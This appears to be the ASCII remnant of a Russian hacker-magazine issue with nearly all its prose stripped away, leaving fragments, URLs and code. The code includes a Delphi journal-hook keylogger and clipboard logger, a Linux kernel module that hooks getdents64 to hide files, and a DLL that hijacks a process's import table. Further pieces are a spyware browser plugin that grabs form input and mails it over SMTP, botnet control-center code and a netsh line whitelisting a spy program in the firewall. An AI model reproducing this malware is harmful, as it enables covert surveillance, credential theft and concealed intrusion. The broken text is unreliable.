9% kernelMode kernel + UserMode
:
:

.
IoAttachDevice, \\Device\\KeyboardClass0. IRP IRP_MJ_READ

IoSetCompletionRoutine.
5 .
,
,
.
6 -.
UserMode, . UserMode csrss.exe


API- GetMessage PeekMessage. KernelMode
KeServiceDescriptorTableShadow
, PeekMessage. :
2-3 . ,
-
,
. UserMode
KernelMode ,
.

7 .
. ,
$50-100, .
, 65

, .
( ).
,
.
10% -.
- .
,
. ( ),
10%
, . ,
(
..).
, , ELITE Keylogger 2.6, - ( ) .
. .
:
1 .
,
. ,
http://www.keyghost.com/securekb.htm.
2 . . KEYKatcher Hardware Keyloggers (http://www.keykatcher.com/),
:
PS/2- USB-. KeyGhost
(http://www.keyghost.com/).
.

( ). ,
Actual Spy.

, ,
,


4/5
Actual Spy
www.actualspy.ru/
1.5


,
.
. , ,
.
, ,
,
( -

Windows),

. AVZ
,
:
C:\Program Files\
ASMonitor\hprog.dll -->
Keylogger
DLL
C:\Program Files\
ASMonitor\hk.dll -->
Keylogger
DLL
C:\Program Files
\ASMonitor\hk.dll>>>
:

1.
:
2.
: 2024
C:\Program Files\
ASMonitor\ASMonitor.exe
( = "Actual Spy

")


hprog.dll
, hk.dll .

, ,
hprog.dll
NT-.

, .
, BAT-
netsh firewall
add allowedprogram program=asmonitor.exe name=System.


asmonitor.exe

Firewall.

5/5

ELITE Keylogger 2.6 -


. www.widestep.com

3


( ).
. usbkbd.sys
.


ZwCreateKey, ZwEnumerateKey ZwOpenKey , .
extfs.sys

.
6- .
, , tdiip.sys
, ,
.


,
:
,
( ,
).

,

,

.
-

,


, -
.

3/5

: ,

Family Key Logger


www.spyarsenal.com

,
, , ,

AVZ:

,
C:\WINDOWS\
system32\CTF\ctfmon.dll -->
Keylogger
DLL
C:\WINDOWS\
system32\CTF\ctfmon.dll>>>

C:\WINDOWS\

system32\CTF\ctfs.dll -->

1.

Keylogger

DLL

2. :

C:\WINDOWS\

c:\windows\

system32\CTF\ctfs.dll>>>

system32\ctf\ctfmon.txt

3.

1.

: \windows\


system32\ctf\ctfmon.txt
4. ,

5.

6.

7.
ASCII-

5/5
Advanced Anti
Keylogger
www.anti-keylogger.net


PrivacyKeyboard www.anti-keylogger.net/,
800 .

.
,
, ,

, :).

: , ,
ActualSpy. Ctfs.dll



, ctfmon.dll
.
ActualSpy

,


ctfmon.txt,
.


.

, ,

( , , ).

,
.
, Advanced Anti
Keylogger
,



,
, .
Firewall.

4/5
PrivacyKeyboard
www.bezpeka.biz

PrivacyKeyboard

.
,

$90.


,
,
(
GUI- KeServiceDescriptorTableShadow
).

,
.
,
, . -
. , PrivacyKeyboard ,
DKOM-.


.
. , DLL.
WH_JOURNALRECORD, , - , , . :

, DLL.
, DLL.
, WH_JOURNALRECORD
: ,
. :
CTRL+ALT+DEL CTRL+ESC
.
. : InstallHook
RemoveHook . , , API SetWindowsHookEx UnhookWindowsHookEx, , . HookHandle
INVALID_HANDLE_VALUE.
function InstallHook : boolean;
begin
  if HookHandle = INVALID_HANDLE_VALUE then
    HookHandle := SetWindowsHookEx(WH_JOURNALRECORD, @HookProc, hInstance, 0);
  Result := HookHandle <> INVALID_HANDLE_VALUE;
end;

function RemoveHook : boolean;
begin
  if HookHandle <> INVALID_HANDLE_VALUE then
    UnhookWindowsHookEx(HookHandle);
  HookHandle := INVALID_HANDLE_VALUE;
  Result := true;
end;
, :
procedure TForm1.FormDestroy(Sender: TObject);
begin

RemoveHook;
end;
. nCode , . nCode
HC_ACTION, lParam EVENTMSG. HC_SYSMODALOFF HC_SYSMODALON
: ,
( )
. .
function HookProc(nCode: integer; WParam: Word; LParam: LongInt): Longint; stdcall;
var
  EventMsg : PEventMsg;       // pointer to the EVENTMSG record
  VirtCode : byte;            // virtual key code
  ScanCode : dword;           // scan code
  KeyState : TKeyboardState;  // keyboard state
  Tmp, S : string;            // temporary buffer and output line
  Res : integer;
begin
  s := '';
  if nCode = HC_ACTION then begin
    EventMsg := pointer(LParam);
    case EventMsg^.message of
      WM_LBUTTONDOWN : S := 'left mouse button down';
      WM_RBUTTONDOWN : S := 'right mouse button down';
      WM_LBUTTONUP   : S := 'left mouse button up';
      WM_RBUTTONUP   : S := 'right mouse button up';
      WM_MOUSEMOVE   : S := 'mouse move (X=' + IntToStr(EventMsg^.paramL) +
                            ', Y=' + IntToStr(EventMsg^.paramH) + ')';
      WM_KEYDOWN : begin
        // virtual key code and scan code
        VirtCode := EventMsg^.paramL and $FF;
        ScanCode := (EventMsg^.paramL and $FF00) shl 8;
        // buffer for the key name
        SetLength(Tmp, 32);
        // key name; Res receives its length
        Res := GetKeyNameText(ScanCode, @Tmp[1], Length(Tmp));
        S := 'key "' + copy(Tmp, 1, Res) + '"';
        // current keyboard state
        GetKeyboardState(KeyState);
        // translate to an ASCII character
        Res := ToAscii(VirtCode, ScanCode, KeyState, @Tmp[1], 0);
        if Res > 0 then
          S := S + ' = "' + copy(Tmp, 1, Res) + '"';
      end;
    else
      S := 'message ' + IntToHex(EventMsg^.message, 4);
    end;
    Form1.Memo1.Lines.Add(s);
  end;
  Result := CallNextHookEx(HookHandle, nCode, wParam, LParam);
end;
. nCode HC_ACTION,
EventMsg.
paramL X- , paramH Y.
paramL (
-,
), paramH 15- .
.
API GetKeyNameText ToAscii,
-. paramL, .
((EventMsg^.paramL and
$FF00) shl 8 , -
16..23.
8..15 paramL,
, 8 .
GetKeyNameText
, ToAscii
:
GetKeyboardState, -

:
.
.
.



ToAscii. GetKeyboardState
256 .

.
,
. , . WM_CANCELJOURNAL. ,
WM_CANCELJOURNAL .
procedure TForm1.OnAppMessage(var Msg: TMsg; var Handled: Boolean);
begin
  if (Msg.message = WM_CANCELJOURNAL) and (HookHandle <> INVALID_HANDLE_VALUE) then begin
    HookHandle := INVALID_HANDLE_VALUE;
    InstallHook;
    Memo1.Lines.Add('<< hook reinstalled >>');
    Handled := true;
  end;
end;

procedure TForm1.FormCreate(Sender: TObject);
begin
  Application.OnMessage := OnAppMessage;
  InstallHook;
end;
,
, Windows 9x
NT, DLL.

:
1 , .
2
WH_DEBUG.
,

.

,
. ,
. :
1 . , , .
2
SetClipboardViewer . -

.
3 , .
SetClipboardViewer
, .
.
SetClipboardViewer .
, SetClipboardViewer , SetClipboardViewer . WM_DRAWCLIPBOARD . , ( !) . , ,
, .
, -
, .
ChangeClipboardChain,

. WM_CHANGECBCHAIN , ,
.

. ,
. :
procedure TCMForm.FormCreate(Sender: TObject);
begin
  hNextClipboardViewer := SetClipboardViewer(Handle);
  if hNextClipboardViewer > 0 then
    Memo1.Lines.Add('Clipboard viewer installed. Next hWnd = ' + IntToHex(hNextClipboardViewer, 8))
  else
    Memo1.Lines.Add('SetClipboardViewer: GetLastError = ' + IntToStr(GetLastError));
end;

procedure TCMForm.FormDestroy(Sender: TObject);
begin
  ChangeClipboardChain(Handle, hNextClipboardViewer);
end;
WM_CHANGECBCHAIN
WM_DRAWCLIPBOARD, :

procedure WMCHANGECBCHAIN(var Message:


TWMCHANGECBCHAIN); message
WM_CHANGECBCHAIN;
procedure WMDRAWCLIPBOARD(var Message:
TMessage); message WM_DRAWCLIPBOARD;
WM_CHANGECBCHAIN ,
:
procedure TCMForm.WMCHANGECBCHAIN(var Message: TWMCHANGECBCHAIN);
begin
  // Is the window being removed the next viewer in our chain?
  if Message.Remove = hNextClipboardViewer then
    hNextClipboardViewer := Message.Next;
  SendMessage(hNextClipboardViewer, Message.Msg, Message.Remove, Message.Next);
end;
, WM_DRAWCLIPBOARD ,
.
:
procedure TCMForm.WMDRAWCLIPBOARD(var Message: TMessage);
begin
  // Log the clipboard text
  Memo1.Lines.Add(clipboard.AsText);
  Memo1.Lines.Add('--------------');
  // Pass the message on to the next viewer in the chain
  SendMessage(hNextClipboardViewer, Message.Msg, Message.WParam, Message.LParam);
end;
.
.
. ,
. , .

. 100%
. , ,

KeServiceDescriptorTableShadow .

!



:
.
.
: ,
SPYWARE,
, , .
, ,
, .


semuha@mail.ru

.
. .
, Creeper
I'm the creeper : catch me if you can.

. , , . 1986
. Brain IBM- .
.
Brain
. Brain

,
, , ! ? , Brain .
90- . ,
? Chameleon, .
, . , ,

,
,
.
,
. , 90- . -, ,
.
Dark Avenger.

MtE.


. ,
. , Peach, 1992 ,
. , . , , backdoors. 1998 BackOrifice (Backdoor.BO), ()

. 2000 ,
BackOrifice BO2k, -

,
.
- ZippedFiles,
,
Neolite. Neolite ( , , ,
PKZip LZExe. . ). , ,

,
. ,
.
. , ,
,

XX , ,
.
, , , . , , ?



, ,
,
, .
( :)).
. ,
, . -



DRM-
SONY.



FIRST 4 INTERNET. ,
.

.
,




.
,
,
$SYS$,
.


BACKDOOR.WIN32.BREPLIBOT.B,

.
-

,
$SYS$
($SYS$DRV.EXE). ,

DRM-
SONY
. BREPLIBOT
,
.

,
,



.

, , ,
-.

, ,
,
.
:
, , IM, , ntfs
.
. ,
UNIX
, Windows,
rootkit,
stealth-, Windows.


, ifconfig, ps, top, login, ls, netstat,
libproc.a.
,
. ,
.
, ,
, syslogd;
, .
, .
.
1 LKM.
, ,
.
2
. ,
, autofs, md5, scsi_mod, floppy.
.
3 ,
. , , , .
/dev/kmem.
LKM,
. , , . .
, . , ,
:

. url-
Paypal.

#include <dirent.h>
struct dirent *dirstr;
DIR * mydir=opendir("/tmp");
dirstr=readdir(mydir);
ltrace , :
SYS_getdents64(3, 0x08049678, 4096, 0x40014400, 0x4014c2c0)
getdents64 , struct dirent. - , getdents64,
dirent d_reclen d_name,
, . .
// Kernel module that hooks getdents64 and filters one entry out of directory listings
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/types.h>
#include <linux/dirent.h>
#include <linux/slab.h>
#include <linux/string.h>
#include <sys/syscall.h>
#include <asm/uaccess.h>

extern void *sys_call_table[];
int (*real_getd)(u_int fil, struct dirent *dirp, u_int cnt);

// Replacement for the original getdents64
int our_getd(u_int fil, struct dirent *dirp, u_int cnt)
{
    // Layout of a 64-bit directory entry
    struct dirent64 {
        int d_ino1, d_ino2, d_off1, d_off2;
        unsigned short d_reclen;
        unsigned char d_type;
        char d_name[0];
    } *dirp2, *dirp3;
    // Name of the entry to hide
    char file_hide[] = "file_to_hide";
    unsigned int bak, n;
    int bak2;

    bak = (*real_getd)(fil, dirp, cnt);
    if (bak > 0) {
        // Copy the buffer returned by the real syscall into kernel memory
        dirp2 = (struct dirent64 *)kmalloc(bak, GFP_KERNEL);
        copy_from_user(dirp2, dirp, bak);
        dirp3 = dirp2;
        bak2 = bak;
        // Walk the records
        while (bak2 > 0) {
            // d_reclen is the size of the current record
            n = dirp3->d_reclen;
            bak2 -= n;
            // If the name matches, drop the record by shifting the rest down
            if (strstr((char *)&(dirp3->d_name), (char *)&file_hide) != NULL) {
                memcpy(dirp3, (char *)dirp3 + dirp3->d_reclen, bak2);
                bak -= n;
            }
            // Advance to the next record
            dirp3 = (struct dirent64 *)((char *)dirp3 + dirp3->d_reclen);
        }
        // Copy the filtered buffer back to user space
        copy_to_user(dirp, dirp2, bak);
        kfree(dirp2);
    }
    // Return the (possibly reduced) byte count
    return bak;
}

// Install the hook
int init_module(void)
{
    real_getd = sys_call_table[SYS_getdents64];
    sys_call_table[SYS_getdents64] = our_getd;
    return 0;
}

// Restore the original handler
void cleanup_module()
{
    sys_call_table[SYS_getdents64] = real_getd;
}

0-day


,
.
zero-day ,
, .
, , . , ,
fishing-,
,
.
,
ntfs. ,
Stream
(ADS) NTFS.
, .
, cross-site scripting
-(-, ), -

. ,
Yamanner
2006 200
- Yahoo!Mail.
-.

. .

.
,
: xor
,
.
.

.
- html-
. ,
.
Feebs Scano,
,
Windows . . ,
root, rootkit,

. Windows
:
1 . Windows
-

java-. - False positive, .


C

Feebs Scano , , html . , exe- .doc. , .

. . . , 0-day. , , , ,
, .
, IT-,
,
.


eEye Digital Security , . ,

. Next-Generation Security ,
- BIOS. ACPI,
. Microsoft

, . , .
,
. ,
BIOS , , .
.

,
,
.


, .
, . ,
,
, , Task Manager.
2 API-
dll. . dll: , , . ,
, DLL
, , DLL , - . ,

API-. API- / ,
GetProcAddress,
dll-,
.

.
/ , JUMP, . , ,
PE- .
, , dll.
.
,
. ,
,
, .
ExitWindowsEx
:
#include <windows.h>
#include <stdio.h>
#include <string.h>

// Saved address of the real ExitWindowsEx
DWORD ExitW_Addr;

BOOL WINAPI OurFunction(UINT uFl, DWORD dwR);
void Substitute(void);

// DLL entry point: when the library is mapped into the process
// (DLL_PROCESS_ATTACH), Substitute() installs the hook
BOOL APIENTRY DllMain(HANDLE hm, DWORD my_f, LPVOID lpcd)
{
    if (my_f == DLL_PROCESS_ATTACH)
        Substitute();
    return TRUE;
}

// Substitute() patches the import table (.idata) of the host process
void Substitute(void)
{
    // Base address of the PE image of the current process
    BYTE *pimage = (BYTE*)GetModuleHandle(NULL);
    IMAGE_DOS_HEADER *imdh;
    IMAGE_OPTIONAL_HEADER *imoh;
    IMAGE_SECTION_HEADER *imsh;
    IMAGE_IMPORT_DESCRIPTOR *imid;
    DWORD *imsd;
    DWORD func_b, a, written = 0;
    int i;

    // Locate the PE headers
    imdh = (IMAGE_DOS_HEADER*)pimage;
    imoh = (IMAGE_OPTIONAL_HEADER*)(pimage + imdh->e_lfanew + 4 + sizeof(IMAGE_FILE_HEADER));
    imsh = (IMAGE_SECTION_HEADER*)((BYTE*)imoh + sizeof(IMAGE_OPTIONAL_HEADER));
    // Check the DOS signature ("MZ")
    if (imdh->e_magic != 0x5A4D) {
        printf("not a PE image");
        return;
    }
    // Find the .idata section
    for (i = 0; i < 16; i++)
        if (strcmp((char*)((imsh + i)->Name), ".idata") == 0) break;
    if (i == 16) {
        printf(".idata section not found");
        return;
    }
    // Import descriptors start at the beginning of .idata
    imid = (IMAGE_IMPORT_DESCRIPTOR*)(pimage + (imsh + i)->VirtualAddress);
    // Address of the real ExitWindowsEx
    ExitW_Addr = (DWORD)GetProcAddress(GetModuleHandle("user32.dll"), "ExitWindowsEx");
    if (ExitW_Addr == 0) {
        printf("ExitW_Addr not found");
        return;
    }
    // ExitWindowsEx is imported from user32.dll, so find that descriptor
    while (imid->Name) {
        if (strcmp((char*)(pimage + imid->Name), "USER32.dll") == 0) break;
        imid++;
    }
    if (!imid->Name) {
        printf("USER32.dll import descriptor not found");
        return;
    }
    // Scan the import address table for the slot holding ExitWindowsEx
    imsd = (DWORD*)(pimage + imid->FirstThunk);
    while (*imsd != ExitW_Addr && *imsd != 0) imsd++;
    if (*imsd == 0) {
        printf("ExitW_Addr not found in .idata");
        return;
    }
    // Overwrite the slot with the address of our function
    func_b = (DWORD)&OurFunction;
    VirtualProtect((void*)imsd, 4, PAGE_READWRITE, &a);
    WriteProcessMemory(GetCurrentProcess(), (void*)imsd, (void*)&func_b, 4, &written);
    VirtualProtect((void*)imsd, 4, a, &a);
    if (written != 4) {
        printf("failed to patch the import table");
        return;
    }
}

// Our replacement: any processing goes here, then the original is called
BOOL WINAPI OurFunction(UINT uFl, DWORD dwR)
{
    ((BOOL (WINAPI*)(UINT, DWORD))ExitW_Addr)(uFl, dwR);
    return 0;
}
? , ,
. . ,

http://en.wikipedia.org/wiki/Rootkit
wikipedia
http://www.chkrootkit.org
chkrootkit


SPYWARE BHO
IE .
? , ,
.
( )? ,
,

aka zOrd
ICQ: 291637112, www.offbit.1gb.ru
Browser Helper Object.
, Browser Helper Object DLL,
Windows
Microsoft Internet Explorer ( Get Right,
Flyswats, Quiver, Blink, iHarvest Godzilla).
(helper ), , ( ),
DLL ,
, BHO. BHO , Browser Helper Objects spyware.
BHO . BHO COM, DLL
, COM-,
, ,
. IObjectWithSite IWebBrowser2,
!
,

-
, .
.
, BHO,
, .
-? , , e-mail .

,
get_Document, IDispatch.
IHTMLDocument2. , .
BHO. , ? . Win32 Application, ALT COM,
, ALT COM--

.
Add ALT Objects Internet Explorer Object. ,
, .
, BHO.
, , :
class ATL_NO_VTABLE CBHO:
public CComObjectRootEx
<CComSingleThreadModel>,
public CComCoClass<CBHO, &CLSID_BHO>,
public IObjectWithSiteImpl<CBHO>,
public IDispatchImpl<IBHO, &IID_IBHO,
&LIBID_IEPLUGINLib>
,
:


public:
STDMETHOD(SetSite)(IUnknown *pUnkSite);
STDMETHOD(Invoke)(DISPID, REFIID, LCID,
WORD, DISPPARAMS*, VARIANT*, EXCEPINFO*,
UINT*);
private:
STDMETHOD(Connect)(void);
CComQIPtr<IWebBrowser2,
&IID_IWebBrowser2> m_spWebBrowser2;
CComQIPtr<IConnectionPointContainer,
&IID_IConnectionPointContainer> m_spCPC;
DWORD m_dwCookie;
, spyware .
MSDN onkeypress ( MSDN 2005),
get_onkeypress, IHTMLElement::onkeypress).

.
get_Document,
IDispatch.
:
CComPtr<IDispatch> pDisp;
m_spWebBrowser2->get_Document(&pDisp);
IHTMLDocument . :
CComQIPtr<IHTMLDocument2, &IID_IHTMLDocument2> spHTML;
spHTML = pDisp;

.

get_body, spHTML. , , ,
spyware.
IHTMLElement , / . .

. ,
onkeypress:
HTMLTextContainerEvents2
HTMLAnchorEvents2
HTMLFormElementEvents2
HTMLTableEvents2

, :

BHO Visual C++

#define BUFSIZE 4096


...
HTMLTextContainerEvents2->
onkeypress(&pDesp)
...
BHO . ,
. - , ?
!
URL
.
get_LocationURL, :
BSTR wstr;
m_spWebBrowser->get_LocationURL(&wstr);
wstr
, .
. :
#define BUFSIZE 4096
DWORD dwBytesRead, dwBytesWritten, dwBufSize=BUFSIZE;
BOOL f_wf;
f_wf=WriteFile(hTempFile, buffer,
dwBytesRead, &dwBytesWritten, NULL);
. ,
, . Browser
Helper Object , .

rgs. , ,

.
, BHO , . ,
, CLSID TypeLib ,
BHO.
, ,
BHO IE:
HKLM
{
  SOFTWARE
  {
    Microsoft
    {
      Windows
      {
        CurrentVersion
        {
          Explorer
          {
            'Browser Helper Objects'
            {
              ForceRemove {G4G53DNL-Q9LF-OV7D-3753538543BVB7} = s 'SPYFORM'
            }
          }
        }
      }
    }
  }
}

regsvr32 c /s /c DLL.
? ,
,
.
?
.
, :
#define BUFSIZE 4096
void WriteBuffer (void)
{
hFile = CreateFile("spyform.txt",
GENERIC_READ,
0,
NULL,
OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL,
NULL);
...
DWORD dwBytesRead;
BOOL f_rf;
BYTE bBugIE[BUFSIZE];
f_rf = ReadFile(hFile, buffer, BUFSIZE,
&dwBytesRead, NULL);
...
CloseHandle(hFile);
}

, ActiveX.
Explorer , .
ActiveX
CLSID, CLSID
ActiveX (
WScript.Network):


SMPT. smpt-:

<script>
function modify(){
theActiveX.setCLSID("{F935DC26-1CF0-11D0ADB9-00C04FD58A0B}")// CLSID
// .
//
, ,

theActiveX.createInstance()
//
WshNetwork = theActiveX.GetObject()
//
var userName=WshNetwork.UserName;
//
}
</script>

SOCKET nSMTPServerSocket;
struct sockaddr_in smtp_address;
int nConnect;
int iLength;
int iMsg = 0;
int iEnd = 0;
BYTE sBuf[4096];
:
char *MailMessage[] =
{
"HELO SpyForm\r\n",
"MAIL FROM:<---->\r\n",
//
"RCPT TO:<---->\r\n",
//
"DATA\r\n",
"<&BugIE\r\n\r\n.\r\n",
//
"QUIT\r\n",
NULL
};
smtp_address
,
,
.
:
-.
. . :

? ActiveX-,
, . ,
, Word Excel. web-, HTML.

ActiveX . ,
,
.. ActiveX- .

.


, , :
<script>setTimeout
("modify()",1000);//
CLSID
</script>
CLSID-
CLSID,

!
! ,
,
! , BHO.
, - , ? ,
. , BHO
,
URL. .
//
IWebBrowser2
m_spWebBrowser->Navigate
(TEXT("http://www.offbit.1gb.ru"),0,0,0,0);
BHO --

! ,
, . ,
:
IObjectWithSite
IPersistStream
IDeskBand
IDeskBand. , , ,
!
. :
STDMETHODIMP CExplorerBar::ShowDW
(BOOL fShow)
{
if(m_hWnd)
{
if(fShow)
{
//show our window
ShowWindow(m_hWnd, SW_SHOW);
}
else
{
//hide our window
ShowWindow(m_hWnd, SW_HIDE);
}
}
return S_OK;
}
, ,
MSDN, Creating Custom Explorer Bars, Tool Bands, and Desk Bands Bars & Bands.

Internet Explorer, .
IHTMLDocument2
, , , : close, open,
offline , , write. IE !
The End.
BHO. MSDN,
,
. ,

!
, , !
http://msdn.microsoft.com/library/default.asp?url=/library/en-us/dnwebgen/html/bho.asp
BHO
www.antichat.ru/activex
ActiveX

:


KERNEL-
IBM PC
#
FLASH
-

DELPHI 2006

WINDOWS V ISTA
.
MICROSOFT. . ,
.
W INDOWS
WINDOWS.
. .



-

,

.

,
,
DDOS-,
,

.
,
BOT CONTROL CENTER
aka Sulverus,
sulverus@mail.ru (Offbit Security Team)

? ,
, ,
, : ,
,
. , : , ,

.., . control
center ,
,
- .
, 100% , -

, ,
, ,
- . ,
, -,
. , , , - . . ,
!

. ,
perle'e php,
, #. - ASP.NET, C# -.
ASP.NET Web Site C# .
ASP.NET
System.Web. UI, WebControls, WebControls.WebParts, HtmlControls.
( , , ),
Sy-


, , ,
,
. , .
,
ListBox. , : ,
. , .
,
System.Text
, :
string int.
Convert, .
IP- int:

ListBox'a, , , :

string items =
ListBox1.Items.Count.ToString();
int itm = Convert.ToInt32(items);

int:
string BOTport = TextBox4.Text;
int prt = Convert.ToInt32(BOTport);

stem.Web.Security. : , , ,
.
. , , .
. , . , System.Net System.Net.Sockets.
, , .
-. , , IP-


( ).
, : , ,
.
IPHostEntry, IPAdress, IPEndPoint, , TCP,
,
Encoding.ASCII.GetBytes(msg). , , . Socket.Shutdown() Socket.Close(). ,
. , ,
: ,
IP- -

string msg = TextBox1.Text;


byte[] msg2 = Encoding.ASCII.GetBytes(msg);
, ,
.
. -,
web.config,
.
<authentication mode="Windows"/>

<authentication mode="Off"/>,
, , ,
.
.
.
Vista Style. ,

, ,
, .
?
, ,
,
. . -

...



for (i = 0; i < itm; i++)
{
ListBox1.SelectedIndex = i;
IPHostEntry host = Dns.Resolve(ListBox1.SelectedItem.Text);
//

(1)

IPAddress ip = host.AddressList[0];
//
IPEndPoint ep = new IPEndPoint(ip, prt);
Socket client_sock = new Socket(AddressFamily.InterNetwork,
SocketType.Stream, ProtocolType.Tcp);
try
{
client_sock.Connect(ep);
string msg = "privet";
//:)
byte[] msg2 = Encoding.ASCII.GetBytes(msg); //
int send_msg = client_sock.Send(msg2);
byte[] data = new byte[1024];
int recv = client_sock.Receive(data);
ListBox2.Items.Add(ip.ToString());
client_sock.Shutdown(SocketShutdown.Both); //
client_sock.Close();
}
catch (SocketException Sock)
{
TextBox7.Text = Sock.ToString();
}
}

,
, , -, . .
ASP.NET Web Service.
?

, ,
,
http- -
( ). System.Web.Services, System.Web.Services.Protocols,
System.Web.Services.Description System.Web.Services.Discovery.
,
- . - HTTP GET/POST SOAP. HTTP. , C#
, [WebMethod]
, , .
, , ,

, : System.Net, System.Net.Sockets, System.Text ASCII,


. , ,
IP-, , , ,
: BINAN(Bot Is Not Available Now). ,
,


:
c
[WebMethod]
public string ActiveBots(string ip,
string port)
{
try
{
int prt = Convert.ToInt32(port);
//
return ip;
}
catch(...)
{
port = "BINAN";
return port;
}
.
, IP- , . .NET, int,
ToInt32() Convert.
IP- ,
, xml-. BINAN
xml. .
.
. ?
-
http-, . , - -.
, ,


. , Windows Application. -,
.
Solution Explorer,
Add Web Reference. - .
,
: using localhost. localhost -


.
-.
. ,
,
. :
localhost.Service bots =
new localhost.Service();
string go = bots.ActiveBots(ip, port);
, , , ,
:

for (i = 0; i < itm; i++)
{
listBox1.SelectedIndex = i;
try
{
string ip =
listBox1.SelectedItem.ToString();
string go =
bots.ActiveBots(ip, "11000");
textBox1.Text = go.ToString();
if (go != "BINAN")
{
listBox2.Items.Add(ip.ToString());
}
} //...
.
: --- -,
-
( ).
,
-
. -, ,
, .
.
spyware-,
, ,
.
.NET'e.
:
- :
if (info.IndexOf("privet") > -1) {
byte[] send_text =
Encoding.ASCII.GetBytes(ip + ":
OKAY!!!"); }

,
.
11000 Net Net.Sockets. :

try
{
listn.Bind(ep); //
listn.Listen(2); //
while (true)
{
Console.WriteLine("Listing.. port
{0}", ep);
Socket hnd = listn.Accept();
//
string info = null;
while (true)
{
byte[] data_g = new byte[1024];
int recev = hnd.Receive(data_g);
//
info += Encoding.ASCII.GetString
(data_g, 0, recev);
//
//

. .NET .
,
-.
, , . . ,
, -. 1-2
, 3-4 :).
, .NET ,
, , 2005
. : DDoS-
.
//
,
,
net renderinga
3d max'e. , . - ,
-
-
,
-
,
,



( ) .
SOFT-ICE
,
,

aka

MS-DOS
.
,
,
. ( malware)
, , ..
Windows .

, ,
.

.

( ) Windows .
,
,
.
,

soft-ice .
, . , soft-ice, <CTRL-D>,
... - ?! ...


soft-ice ( )
:THREAD -x
Extended Thread Info for thread 374
KTEB:       873CFDA0    TID: 374    Process: va_thread(11C)
Start EIP:  KERNEL32!SetUnhandledExceptionFilter+001A (77E878C1)
User Stack: 00030000 00130000    Stack Ptr: 0012FD24

Extended Thread Info for thread 238
KTEB:       82007020    TID: 238    Process: va_thread(11C)
Start EIP:  KERNEL32!CreateFileA+00C3 (77E92C50)
User Stack: 00420000 00520000    Stack Ptr: FFFFFFFF

Extended Thread Info for thread 30C
KTEB:       82007AC0    TID: 30C    Process: va_thread(11C)
Start EIP:  KERNEL32!CreateFileA+00C3 (77E92C50)
User Stack: 00530000 00630000    Stack Ptr: FFFFFFFF

(1)

, OllyDbg
Ident  Entry     Data block  Last error     Status     Priority
050C   7943B700  7FFDB000    ERROR_SUCCESS  Active     32 + 0
0558   00000000  7FFDC000    ERROR_SUCCESS  Suspended  32 + 0
055C   00000000  7FFDE000    ERROR_SUCCESS  Suspended  32 + 0
0578   00000000  7FFDD000    ERROR_SUCCESS  Suspended  32 + 0

(2)

558h,
401000  55            PUSH EBP
401001  8B EC         MOV EBP,ESP
401003  B8 01000000   MOV EAX,1
401008  85C0          TEST EAX,EAX
40100A  74 02         JE SHORT va_threa.0040100E
40100C  EB F5         JMP SHORT va_threa.00401003

(3)

55Ch
62FFDC FFFFFFFF End of SEH chain
62FFE0 79481F54 SE handler
62FFE4 79432B08 KERNEL32.79432B08
62FFE8 00000000
62FFEC 00000000
62FFF0 00000000
62FFF4 00520000   ; 55h
62FFF8 00000666
62FFFC 00000000

(4)

va_thread
Address  Size  Owner     Section  Contains      Type  Access   Initial
400000   1000  va_threa           PE header     Imag  R        RWE
401000   4000  va_threa  .text    code          Imag  R        RWE
405000   1000  va_threa  .rdata   imports       Imag  R        RWE
406000   2000  va_threa  .data    data          Imag  R        RWE
410000   2000                                   Map   R        R
51E000   1000                                   Priv  RW Guar  RW
51F000   1000                     stack of thr  Priv  RW Guar  RW
520000   1000                                   Priv  RWE      RWE
62E000   1000                                   Priv  RW Guar  RW

(5)

. , ( PE-, , , - ).
malware- / , .
,
,
.  
  , xxx
( ). , , . : FAR'
(<CTRL-F8>)
WINNT, System32 ..
, , !
, ,

,
. , ( , Program Files, WINNT System32),
( , ),
.
.
, win32-API, , , . NTFS- , API. ,
30h ($FILE_NAME)
//
MFT (Master File Table ,
).
MFT ,
. 10h ($STANDARD_INFORMATION),
// MFT, , 30h, MFT , ,
.
, MFT .
NtExplorer Runtime Software. -


, ,
Windows
( hldrrr.exe,
C:\WINNT\system32)


Runtime NtExplorer
(FAR , 07.05.2004,
MFT
18.07.2006)

.
(
),
, .
?
NT : TOOLHELP32
( 9x), KERNEL32.DLL,
NtQuerySystemInformation ( NTDLL.DLL),
97h, NTOSKRNL.EXE. ,
TOOLHELP32 CreateToolhelp32Snapshot
NtQuerySystemInformation, , .
Process32First/Process32Next TOOLHELP32,
,
( , FAR tlist.exe SDK) NtQuerySystemInformation ( soft ice).
NtQuerySystemInformation
, TOOLHELP32. , :
NTDLL.DLL ,
NTQUERYSYSTEMINFORMATION
( - NTDLL.DLL),


. , NTDLL.DLL
. SFC SERVICEPACK',
NTDLL.DLL.
1


FAR'

NTDLL.DLL!NTQUERYSYSTEMINFORMATION . NT COPY-ON-WRITE,

, NTDLL.DLL
,
-. , , .
. DLL

2

, Norton Disk Editor,


NTFS. , NtExplorer
, , . NTFS
( ) ,
- , :
http://linux-ntfs.sourceforge.net. ,
, . !

:
HKLM\SOFTWARE\MICROSOFT\WINDOWS
NT\CURRENTVERSION\WINDOWS\APPINIT_DLLS. DLL

.
NTDLL.DLL
,
(TASKMNG.EXE, FAR.EXE, TLIST.EXE . .).
, NTQUERYSYSTEMINFORMATION,
. , , APPINIT_DLLS, ,
.
TASKMNG.EXE ( ),
PROCLIST.DLL ( FAR', ), TLIST.EXE ( ), NTQUERYSYSTEMINFORMATION . ,

PE TOOLS
PROCDUMP'. GETPROCADDRESS, NTDLL.DLL.
3

, NTOSKRNL.EXE
97h .

(
SST).
Soft-Ice NtQuerySystemInformation

,
.
,
soft-ice (, PROC),
, IceExt/IceDump (, ).

. , IceExt, soft-ice ,
, ,
.


578h
12FFE0 FFFFFFFF End of SEH chain
12FFE4 79481F54 SE handler
12FFE8 79432B18 KERNEL32.79432B18
12FFEC 00000000
12FFF0 00000000
12FFF4 00000000
12FFF8 00401405 va_threa.<ModuleEntryPoint>   ; 578h
12FFFC 00000000

(6)

ZwQuerySystemInformation 97h
.text:77F95BBD                 public ZwQuerySystemInformation
.text:77F95BBD ZwQuerySystemInformation proc near
.text:77F95BBD arg_0 = byte ptr 4
.text:77F95BBD
.text:77F95BBD B8 97 00 00 00    mov     eax, 97h        ; NtQuerySystemInformation
.text:77F95BC2 8D 54 24 04       lea     edx, [esp+arg_0]
.text:77F95BC6 CD 2E             int     2Eh
.text:77F95BC8 C2 10 00          retn    10h
.text:77F95BC8 ZwQuerySystemInformation endp

(7)

soft-ice, 97h
:d KeServiceDescriptorTable
